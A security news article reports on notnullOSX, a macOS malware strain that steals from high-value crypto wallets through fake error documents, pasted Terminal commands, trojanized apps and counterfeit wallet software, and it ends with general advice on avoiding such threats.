notnullOSX Malware Targets High-Value Crypto Wallets with Stealthy macOS Attacks
scsecApril 11, 20262 Mins read 
A newly discovered macOS malware strain, known as notnullOSX, is targeting cryptocurrency users with significant holdings, specifically those with wallets exceeding $10,000. Security researchers have identified the threat as a highly focused and evolving attack designed to steal funds and sensitive data from high-value victims.
First detected in late March 2026, the malware has already been observed in multiple regions, including parts of Asia and Europe. Its design reflects a calculated approach, selectively targeting users who are more likely to yield substantial financial returns.
The malware is believed to be developed by a known figure in hacking circles who resurfaced after a period of inactivity and introduced a more advanced, modular tool tailored for macOS systems. This latest version demonstrates a deeper understanding of the platform and modern attack techniques.
The infection process relies heavily on social engineering. Victims are lured through deceptive methods such as fake documents that display error messages, prompting them to take action. In one common scenario, users are instructed to copy and paste a command into the macOS Terminal to resolve a supposed issue. This tactic is particularly effective against developers and crypto users who are accustomed to using command-line tools.
Once executed, the malware requests elevated permissions, including full disk access. Granting this level of access allows it to bypass many built-in macOS protections and access sensitive data such as messages, stored credentials, and personal notes without raising suspicion.
Attackers have also distributed trojanized versions of legitimate applications to further spread the malware. These fake apps are promoted through compromised online platforms, increasing their credibility and reach. After installation, the malware establishes a persistent backdoor, enabling attackers to remotely control the system and deploy additional malicious actions.
One of the most dangerous capabilities of notnullOSX is its ability to target cryptocurrency wallets. It can replace legitimate wallet management applications with malicious versions, tricking users into entering sensitive recovery phrases. This method allows attackers to gain full control over crypto assets, including those stored in hardware wallets if managed through compromised software.
The malware is also capable of targeting popular desktop wallets, broadening its impact across different types of cryptocurrency users. Its modular design suggests that it can be updated and expanded over time, making it an ongoing and evolving threat.
Researchers warn that while the current campaign focuses on high-value targets, the underlying techniques could easily be adapted for wider use. The emergence of notnullOSX highlights the growing sophistication of macOS-focused threats and reinforces the need for caution when interacting with unfamiliar files, commands, or software, even on traditionally secure platforms.
1 Comment
Leave a Reply to scsec Cancel reply
Related Articles
Silent Cryptojacking Campaign Disguised as Non-Profit Software Drains Victims’ PCs
A cybercriminal group has been quietly exploiting unsuspecting users by disguising malware...
Fake Crypto Recruiters Infect Developers with RAT-Laced Coding Challenges in Lazarus-Linked Campaign
A new wave of fake recruiter campaigns attributed to North Korean threat...
First-Ever Crypto Wallet Stealer Discovered on the Apple App Store, 242,000+ Downloads on Google Play Store
Crypto-Stealing Apps Discovered on Apple App Store for the First Time Security...
“Crypto mixer Shutdown: How Law Enforcement Hit Back at Crypto Money Laundering”
Authorities from Switzerland and Germany, with support from Europol and Eurojust, have...
This malware highlights how attackers are increasingly focusing on high-value cryptocurrency users and using sophisticated social engineering to bypass even macOS security protections. The use of fake apps, terminal commands, and permission abuse shows that user behavior remains one of the weakest security links. It reinforces the importance of verifying software sources, avoiding unknown terminal commands, and protecting crypto assets with trusted, verified tools only.